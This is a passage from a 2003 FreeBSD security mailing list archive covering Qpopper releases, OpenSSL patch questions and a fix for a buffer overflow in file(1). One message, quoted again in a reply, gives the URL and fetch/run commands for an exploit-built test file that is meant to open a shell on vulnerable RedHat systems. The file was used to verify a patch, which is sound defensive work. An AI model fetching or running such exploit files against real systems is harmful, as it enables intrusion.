mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 647C237B404 for ; Wed, 12 Mar 2003 12:08:22 -0800 (PST) Received: from monster.schulte.org (monster.schulte.org [209.134.156.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 14F1343F85 for ; Wed, 12 Mar 2003 12:08:21 -0800 (PST) (envelope-from schulte+freebsd@nospam.schulte.org) Received: from localhost (localhost [127.0.0.1]) by monster.schulte.org (Postfix) with ESMTP id 4E84B1FB26; Wed, 12 Mar 2003 14:08:19 -0600 (CST) Received: from raja.nospam.schulte.org (futon.schulte.org [209.134.156.199]) by monster.schulte.org (Postfix) with ESMTP id B11691FB22; Wed, 12 Mar 2003 14:08:16 -0600 (CST) Message-Id: <5.2.0.9.2.20030312135045.03b17b78@localhost> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Wed, 12 Mar 2003 14:08:24 -0600 To: Brett Glass , Mike Tancsa , security@FreeBSD.ORG From: Christopher Schulte Subject: Re: Fwd: Qpopper 4.0.5fc2 available In-Reply-To: <4.3.2.7.2.20030312123805.03d83a20@localhost> References: <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre8 on monster.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:38 PM 3/12/2003 -0700, Brett Glass wrote: >Has the port been patched? Since it's now the 12th, is the final >version up yet? Not as of this moment. I built 4.0.5fc2 source with: # ./configure --enable-apop=/usr/local/etc/qpopper/pop.auth \ --enable-nonauth-file=/usr/local/etc/qpopper/popusers \ --with-apopuid=pop \ --without-gdbm \ --enable-keep-temp-drop \ --enable-standalone \ --with-drac=/usr/local/lib which should be comparable to make -DWITH_STANDALONE_MODE -DWITH_DRAC and then copied popper/popper to /usr/local/libexec/qpopper to run until the port is updated. >--Brett -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 12 12:20:10 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5A85737B401 for ; Wed, 12 Mar 2003 12:20:08 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8BF6D43FDD for ; Wed, 12 Mar 2003 12:20:07 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2CKK78w082638; Wed, 12 Mar 2003 15:20:07 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030312152221.07ac3428@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Wed, 12 Mar 2003 15:24:56 -0500 To: Scott Gerhardt From: Mike Tancsa Subject: Re: Qpopper 4.0.5fc2 available Cc: security@freebsd.org In-Reply-To: References: <5.2.0.9.2.20030312135045.03b17b78@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It does not. ---Mike At 02:16 PM 12/03/2003 -0600, Scott Gerhardt wrote: >Off topic, but does the latest Qpopper support MailDir format? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 12 17:23:24 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A30A037B401 for ; Wed, 12 Mar 2003 17:23:21 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id DAAC143FBD for ; Wed, 12 Mar 2003 17:23:20 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2D1NJ8w086631 for ; Wed, 12 Mar 2003 20:23:20 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030312202817.0658ece8@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Wed, 12 Mar 2003 20:28:46 -0500 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: Qpopper 4.0.5fc3 available Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FYI >To: Qpopper Public List , > qpopper-announce@rohan.qualcomm.com >From: Randall Gellens >Subject: Qpopper 4.0.5fc3 available >X-Random-Sig-Tag: 1.0b25 >X-Spam-Status: No, hits=0.8 required=7.0 > tests=SPAM_PHRASE_00_01 > version=2.43 >X-Virus-Scanned: by Sentex Communications (avscan1/20021227) > >Qpopper 4.0.5fc3 is available at >. > >The full list of changes from one release to the next is on the FTP site, >at . > >Changes from 4.0.5fc2 to 4.0.5fc3: >------------------------------ >11. Fixed '-no-mime' appended to user name (reported by Florian > Heinz). >12. Fixed response message when identical MDEFs defined multiple > times (reported by Florian Heinz). > >Please check this release out and let me know if you encounter any >problems. I plan on releasing 4.0.5 tonight if no problem reports are >received. >-- >Randall Gellens >Opinions are personal; facts are suspect; I speak for myself only >-------------- Randomly-selected tag: --------------- >It takes a wonderful brain and exquisite senses to produce a few >stupid ideas. --Santayana -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 12 21:55: 8 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6508137B401 for ; Wed, 12 Mar 2003 21:55:06 -0800 (PST) Received: from cheer.mahoroba.org (flets20-199.kamome.or.jp [218.45.20.199]) by mx1.FreeBSD.org (Postfix) with ESMTP id D317E43FAF for ; Wed, 12 Mar 2003 21:55:03 -0800 (PST) (envelope-from ume@mahoroba.org) Received: from localhost (IDENT:EeBHje6wEmkhgRZnxuAZgSytMzuuqJkIDpNfG6p5t2chFsk15jTlBIwPmS545QYu@localhost [IPv6:::1]) (user=ume mech=CRAM-MD5 bits=0) by cheer.mahoroba.org (8.12.8/8.12.8) with ESMTP/inet6 id h2D5stcY044667 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Thu, 13 Mar 2003 14:54:55 +0900 (JST) (envelope-from ume@mahoroba.org) Date: Thu, 13 Mar 2003 14:54:55 +0900 Message-ID: From: Hajimu UMEMOTO To: Mike Tancsa Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: Fwd: Qpopper 4.0.5fc2 available In-Reply-To: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> References: <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> User-Agent: xcite1.38> Wanderlust/2.10.0 (Venus) SEMI/1.14.5 (Awara-Onsen) FLIM/1.14.5 (Demachiyanagi) APEL/10.4 Emacs/21.2 (i386--freebsd) MULE/5.0 (=?ISO-2022-JP?B?GyRCOC1MWhsoQg==?=) X-Operating-System: FreeBSD 4.8-RC MIME-Version: 1.0 (generated by SEMI 1.14.5 - "Awara-Onsen") Content-Type: text/plain; charset=US-ASCII X-Virus-Scanned: by AMaViS-perl11-milter (http://amavis.org/) X-Spam-Status: No, hits=-10.0 required=5.0 tests=FWD_MSG,IN_REP_TO,REFERENCES,USER_AGENT version=2.50 X-Spam-Checker-Version: SpamAssassin 2.50 (1.173-2003-02-20-exp) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, >>>>> On Wed, 12 Mar 2003 14:55:43 -0500 >>>>> Mike Tancsa said: mike> I dont see the offical release yet, but I imagine the guy is on the west mike> coast, so its not quite afternoon there. I don't see offcial announce yet, it seems 4.0.5 was out. mike> The only patch that does not apply cleanly in the port is the ipv6 patch. I've just updated my IPv6 patch for 4.0.5: http://www.imasy.or.jp/~ume/ipv6/qpopper4.0.5-ipv6-20030313.diff.gz Sincerely, -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 4:44:45 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D1E2237B401; Thu, 13 Mar 2003 04:44:41 -0800 (PST) Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id CF8DE43FBF; Thu, 13 Mar 2003 04:44:40 -0800 (PST) (envelope-from mike@sentex.net) Received: from house.sentex.net (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.12.8/8.12.6) with ESMTP id h2DCiY8X058047; Thu, 13 Mar 2003 07:44:35 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030313074005.0659cf80@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Thu, 13 Mar 2003 07:42:31 -0500 To: Hajimu UMEMOTO From: Mike Tancsa Subject: Re: Fwd: Qpopper 4.0.5fc2 available (4.0.5 (final) is available) Cc: security@FreeBSD.org In-Reply-To: References: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 02:54 PM 3/13/2003 +0900, Hajimu UMEMOTO wrote: >I don't see offcial announce yet, it seems 4.0.5 was out. > >mike> The only patch that does not apply cleanly in the port is the ipv6 >patch. > >I've just updated my IPv6 patch for 4.0.5: > > http://www.imasy.or.jp/~ume/ipv6/qpopper4.0.5-ipv6-20030313.diff.gz Hi, it looks to be officially out now. From the qpopper mailing list --------------------------------------- X-Mailer: Eudora for Mac OS X v6.0a Date: Wed, 12 Mar 2003 18:41:52 -0800 Errors-To: List Administrator Precedence: bulk List-Subscribe: List-Unsubscribe: List-Archive: List-Post: List-Owner: Pensive Mailing List Admin List-Help: http://www.pensive.org/Mailing_Lists/ List-Id: List-Software: AutoShare 4.2.3 by Mikael Hansen To: Qpopper Public List , qpopper-announce@rohan.qualcomm.com From: Randall Gellens Subject: Qpopper 4.0.5 (final) available Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Random-Sig-Tag: 1.0b25 Message-Id: <757292525474991735373@lists.pensive.org> X-Spam-Status: No, hits=0.8 required=4.0 tests=SPAM_PHRASE_00_01 version=2.43 X-Virus-Scanned: amavis-20020220 X-UIDL: . The full list of changes from one release to the next is on the FTP site, at . Changes from 4.0.4 to 4.0.5: ---------------------------- 1. Add debug trace call with OpenSSL library version. 2. Added 'tls-options' configuration file option. 3. Added 'tls-workarounds' boolean option. 4. STLS errors (except for timeout) no longer fatal. 5. Added sample xinetd configuration file. 6. Additional checks for networking libraries. 7. Pick up LDFLAGS from environment, if set. 8. Added '--enable-32-bit' and '--enable-64-bit' 9. Applied patch from Jeremy Chadwick to fix pathname trimming in standalone mode. 10. Fixed (non-root) buffer overflow. 11. Fixed '-no-mime' appended to user name (reported by Florian Heinz). 12. Fixed response message when identical MDEFs defined multiple times (reported by Florian Heinz). -- Randall Gellens -------------------------------------- -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 4:51:39 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CC5DA37B404; Thu, 13 Mar 2003 04:51:36 -0800 (PST) Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 149D243FD7; Thu, 13 Mar 2003 04:51:36 -0800 (PST) (envelope-from mike@sentex.net) Received: from house.sentex.net (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.12.8/8.12.6) with ESMTP id h2DCpa8X059414; Thu, 13 Mar 2003 07:51:36 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030313074828.07290af0@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Thu, 13 Mar 2003 07:49:31 -0500 To: obrien@FreeBSD.ORG From: Mike Tancsa Subject: MFC of file security fix ? (was Re: Prov. patch for the file hole ISS disclosed) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20030311181452.GA59655@dragon.nuxi.com> References: <20030311174126.GA57179@madman.celabo.org> <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Is there still a plan to MFC this to RELENG_4 ? ---Mike At 10:14 AM 3/11/2003 -0800, David O'Brien wrote: >On Tue, Mar 11, 2003 at 11:41:27AM -0600, Jacques A. Vidrine wrote: > > On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: > > > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: > > > >Thanks! However, this has already been fixed in -CURRENT (by import > > > >of FILE 3.41). I do not know whether or not David plans to MFC in > > > >time for 4.8-RELEASE. > > > > > > I think this should be merged into the security branches, > > > due to possible remote exploit by third party programs that > > > use file, such as (at the very least) amavis. > > > > I tend to agree. > > > > David? > >Up to you. I'm going to do an MFC for 4.8. I am not very well setup to >test the security branches. Do you want me to just MFC exactly what I >committed to 5-CURRENT to the 5_0 branch (it should Just Work). Same for >the 4_7 branch. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 5:44: 6 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 075C937B401 for ; Thu, 13 Mar 2003 05:43:57 -0800 (PST) Received: from pol.dyndns.org (pol.net1.nerim.net [80.65.225.93]) by mx1.FreeBSD.org (Postfix) with ESMTP id 54BAB43FB1 for ; Thu, 13 Mar 2003 05:43:56 -0800 (PST) (envelope-from guy@device.dyndns.org) Received: from oemcomputer.device.dyndns.org (partserver.pol.local [172.16.10.10]) by pol.dyndns.org (8.12.6/8.12.6) with ESMTP id h2DDhbfO025672; Thu, 13 Mar 2003 14:43:41 +0100 (CET) Message-Id: <5.1.1.6.0.20030313132529.041fdec0@device.dyndns.org> X-Sender: guy@device.dyndns.org X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Thu, 13 Mar 2003 14:39:44 +0100 To: amavis-user@lists.sourceforge.net From: "Guy P." Subject: Re: [AMaViS-user] ASA-2003-1: Locally Exploitable Buffer Overflow in file Cc: freebsd-security@freebsd.org In-Reply-To: <200303121821.05890.ianjhart@ntlworld.com> References: <20030312103456.GA8977@nmrc.ie> <20030311171324.GA6731@nmrc.ie> <20030312103456.GA8977@nmrc.ie> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by amavis-milter (http://www.amavis.org/) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 19:21 12/03/2003, ian j hart wrote: [snip the original advisory] >FreeBSD: > Guy has posted an alternative patch to freebsd-security > >http://docs.freebsd.org/cgi/getmsg.cgi?fetch=34195+0+current/freebsd-security > >It's white-space broken, but otherwise seems okay. > >My question is, how do I test it? I'm not going to run something I don't >understand, so can we get a test script published with an MD5? > >-- >ian j hart (Note : CCing to freebsd-security for letting them have the non-white-space-broken versions of the patches.) As i had a few questions about patching file for FreeBSD, lemme try to explain how i made the patch, tested it and how it can be used. Anybody feel free to correct me if i did/said something wrong. Hopefully the FreeBSD team will soon fix that in the STABLE sources (CURRENT was already fixed). I made that 'alternative' patch by diffing the official fixed file version from ftp://ftp.astron.com/pub/file against the current FreeBSD-STABLE sources and keeping the changes relevant to that security problem. I tried to fix the white space problem and make the patch available as http://device.dyndns.org/FILE-FREEBSD-STABLE.PATCH , sorry but am not used to the code writing process under non-windows OSes :] I also put there, for the paranoid kind, a version that will log what looks like attempts to exploit that vulnerability, as http://device.dyndns.org/FILE-FREEBSD-STABLE-SYSLOG.PATCH I tested it using a "carefully crafted" test file, built with the exploit released by "Crazy Einstein" (see http://marc.theaimsgroup.com/?l=bugtraq&m=104696992100353&w=2 ) and targeting RedHat 8.0 - thus if your FreeBSD is vulnerable, it would only crash the file command and not open a shell on port 2003 as intended. The test file is available as http://device.dyndns.org/badfile , i'd suggest RedHat users not to try it :) As requested : MD5 (FILE-FREEBSD-STABLE-SYSLOG.PATCH) = 57b3b4236051ee1fb2d11978a8fec8b0 MD5 (FILE-FREEBSD-STABLE.PATCH) = 00360e2a756e09b9c2eb7730d769287a MD5 (badfile) = 7193a290d03fa6bc446fb36cbef0febe Test & patch process against one of my FreeBSD-STABLE boxes : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= (TESTING) bash-2.05b$ cd /tmp bash-2.05b$ fetch http://device.dyndns.org/badfile Receiving badfile (6304 bytes): 100% 6304 bytes transferred in 0.5 seconds (13.63 kBps) bash-2.05b$ file badfile Segmentation fault (core dumped) (=> file looks like being vulnerable) (PATCHING) bash-2.05b$ fetch http://device.dyndns.org/FILE-FREEBSD-STABLE-SYSLOG.PATCH Receiving FILE-FREEBSD-STABLE-SYSLOG.PATCH (1137 bytes): 100% 1137 bytes transferred in 0.0 seconds (555.71 kBps) bash-2.05b$ cd /usr bash-2.05b$ patch -p0 < /tmp/FILE-FREEBSD-STABLE-SYSLOG.PATCH Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |--- src/contrib/file/readelf.c Sun Nov 26 22:37:21 2000 |+++ src/contrib/file/readelf.c.patched Thu Mar 13 14:13:12 2003 -------------------------- Patching file src/contrib/file/readelf.c using Plan A... Hunk #1 succeeded at 10. Hunk #2 succeeded at 102. Hunk #3 succeeded at 145. done bash-2.05b$ cd src/usr.bin/file bash-2.05b$ make cc -O -pipe -DMAGIC='"/usr/share/misc/magic"' -DBUILTIN_ELF -DELFCORE -DHAVE_CONFIG_H -I/usr/src/usr.bin/file -I/usr/src/usr.bin/file/../../contrib/file -c /usr/src/usr.bin/file/../../contrib/file/readelf.c cc -O -pipe -DMAGIC='"/usr/share/misc/magic"' -DBUILTIN_ELF -DELFCORE -DHAVE_CONFIG_H -I/usr/src/usr.bin/file -I/usr/src/usr.bin/file/../../contrib/file -o file file.o apprentice.o fsmagic.o softmagic.o ascmagic.o compress.o is_tar.o readelf.o print-hacked.o Warning: Object directory not changed from original /usr/src/usr.bin/file bash-2.05b$ su Password: su-2.05b# make install install -s -o root -g wheel -m 555 file /usr/bin install -o root -g wheel -m 444 magic magic.mgc /usr/src/usr.bin/file/../../contrib/file/magic.mime magic.mime.mgc /usr/share/misc install -o root -g wheel -m 444 file.1.gz /usr/share/man/man1 install -o root -g wheel -m 444 magic.5.gz /usr/share/man/man5 su-2.05b# exit exit (TESTING again) bash-2.05b$ cd /tmp bash-2.05b$ file badfile badfile: ELF 32-bit LSB relocatable, AT&T WE32100 - invalid byte order, version 1 (SYSV)file: corrupted section header size. (=> file no longer seems vulnerable) bash-2.05b$ tail -1 /var/log/messages Mar 13 14:27:25 wwwback file: file command buffer overflow attempt against user 501/501 ? (if you used the syslog-able version) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Hope this will be helpfull to some of you. Lemme know if anything needs further talk or whatever. -- Guy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 6: 9:48 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED43D37B401 for ; Thu, 13 Mar 2003 06:09:44 -0800 (PST) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2996243FBF for ; Thu, 13 Mar 2003 06:09:43 -0800 (PST) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 5F7E94BE4 for ; Thu, 13 Mar 2003 08:09:42 -0600 (CST) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id h2DE8qM30505 for freebsd-security@freebsd.org; Thu, 13 Mar 2003 08:08:52 -0600 (CST) (envelope-from hawkeyd) Date: Thu, 13 Mar 2003 08:08:52 -0600 From: D J Hawkey Jr To: security at FreeBSD Subject: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Message-ID: <20030313080852.A30434@sheol.localdomain> Reply-To: hawkeyd@visi.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello All. This is my last hope for "Are the SA-03:02.openssl patches for RELENG_4_6_2 appropriate for RELENG_4_5?". After a dry-run, it appears that only the FreeBSD CVS version numbers keep some half-dozen of the SA-03:02 patches from applying. FreeBSD released 4.4 with OpenSSL 0.9.6a. FreeBSD released 4.5 with the same (though it may have had changes?). FreeBSD released 4.6.2 with OpenSSL 0.9.e. OK. So as I go about cvsup'ing along the RELENG_4_5 tree, at p13, the source is upgraded to OpenSSL 0.9.6e. At p18, it got an ASN.1 patch. So did RELENG_4_6, at p10. Both RELENGs continued to get the same patches until RELENG_4_5 support was dropped. So, up through RELENG_4_6_2 p7 (p8 is SA-03:02), the two RELENGs had the same OpenSSL trees, right? Therefore: Does anyone know that the SA-03:02 patches for RELENG_4_6_2 should not be applied to a RELENG_4_5 tree (after getting by the above versioning SNAFU)? Thanks, Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 6:56:26 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1DD4437B401 for ; Thu, 13 Mar 2003 06:56:21 -0800 (PST) Received: from hermes.pressenter.com (hermes.pressenter.com [209.224.20.19]) by mx1.FreeBSD.org (Postfix) with ESMTP id CD31643FAF for ; Thu, 13 Mar 2003 06:56:17 -0800 (PST) (envelope-from nospam@hiltonbsd.com) Received: from [209.224.36.83] (helo=daggar.sbgnet.net) by hermes.pressenter.com with smtp (Exim 3.16 #1) id 18tU7y-0004ii-00; Thu, 13 Mar 2003 08:56:15 -0600 Date: Thu, 13 Mar 2003 08:56:29 -0600 From: Stephen Hilton To: "Guy P." Cc: amavis-user@lists.sourceforge.net, freebsd-security@FreeBSD.ORG Subject: Re: [AMaViS-user] ASA-2003-1: Locally Exploitable Buffer Overflow in file Message-Id: <20030313085629.30a015a9.nospam@hiltonbsd.com> In-Reply-To: <5.1.1.6.0.20030313132529.041fdec0@device.dyndns.org> References: <20030312103456.GA8977@nmrc.ie> <20030311171324.GA6731@nmrc.ie> <20030312103456.GA8977@nmrc.ie> <5.1.1.6.0.20030313132529.041fdec0@device.dyndns.org> X-Mailer: Sylpheed version 0.8.10 (GTK+ 1.2.10; i386-portbld-freebsd4.8) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 13 Mar 2003 14:39:44 +0100 "Guy P." wrote: > At 19:21 12/03/2003, ian j hart wrote: > [snip the original advisory] > >FreeBSD: > > Guy has posted an alternative patch to freebsd-security > > > >http://docs.freebsd.org/cgi/getmsg.cgi?fetch=34195+0+current/freebsd-security > > > >It's white-space broken, but otherwise seems okay. > > > >My question is, how do I test it? I'm not going to run something I don't > >understand, so can we get a test script published with an MD5? > > > >-- > >ian j hart > > (Note : CCing to freebsd-security for letting them have the > non-white-space-broken versions of the patches.) > > As i had a few questions about patching file for FreeBSD, lemme try to > explain how i made the patch, tested it and how it can be used. Anybody > feel free to correct me if i did/said something wrong. > > Hopefully the FreeBSD team will soon fix that in the STABLE sources > (CURRENT was already fixed). > > > I made that 'alternative' patch by diffing the official fixed file version > from ftp://ftp.astron.com/pub/file against the current FreeBSD-STABLE > sources and keeping the changes relevant to that security problem. > > > I tried to fix the white space problem and make the patch available as > http://device.dyndns.org/FILE-FREEBSD-STABLE.PATCH , sorry but am not used > to the code writing process under non-windows OSes :] > I also put there, for the paranoid kind, a version that will log what looks > like attempts to exploit that vulnerability, as > http://device.dyndns.org/FILE-FREEBSD-STABLE-SYSLOG.PATCH > > > I tested it using a "carefully crafted" test file, built with the exploit > released by "Crazy Einstein" (see > http://marc.theaimsgroup.com/?l=bugtraq&m=104696992100353&w=2 ) and > targeting RedHat 8.0 - thus if your FreeBSD is vulnerable, it would only > crash the file command and not open a shell on port 2003 as intended. The > test file is available as http://device.dyndns.org/badfile , i'd suggest > RedHat users not to try it :) > > As requested : > MD5 (FILE-FREEBSD-STABLE-SYSLOG.PATCH) = 57b3b4236051ee1fb2d11978a8fec8b0 > MD5 (FILE-FREEBSD-STABLE.PATCH) = 00360e2a756e09b9c2eb7730d769287a > MD5 (badfile) = 7193a290d03fa6bc446fb36cbef0febe > > > Test & patch process against one of my FreeBSD-STABLE boxes : > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > (TESTING) > bash-2.05b$ cd /tmp > > bash-2.05b$ fetch http://device.dyndns.org/badfile > Receiving badfile (6304 bytes): 100% > 6304 bytes transferred in 0.5 seconds (13.63 kBps) > > bash-2.05b$ file badfile > Segmentation fault (core dumped) > (=> file looks like being vulnerable) > > (PATCHING) > bash-2.05b$ fetch http://device.dyndns.org/FILE-FREEBSD-STABLE-SYSLOG.PATCH > Receiving FILE-FREEBSD-STABLE-SYSLOG.PATCH (1137 bytes): 100% > 1137 bytes transferred in 0.0 seconds (555.71 kBps) > > bash-2.05b$ cd /usr > > bash-2.05b$ patch -p0 < /tmp/FILE-FREEBSD-STABLE-SYSLOG.PATCH > Hmm... Looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |--- src/contrib/file/readelf.c Sun Nov 26 22:37:21 2000 > |+++ 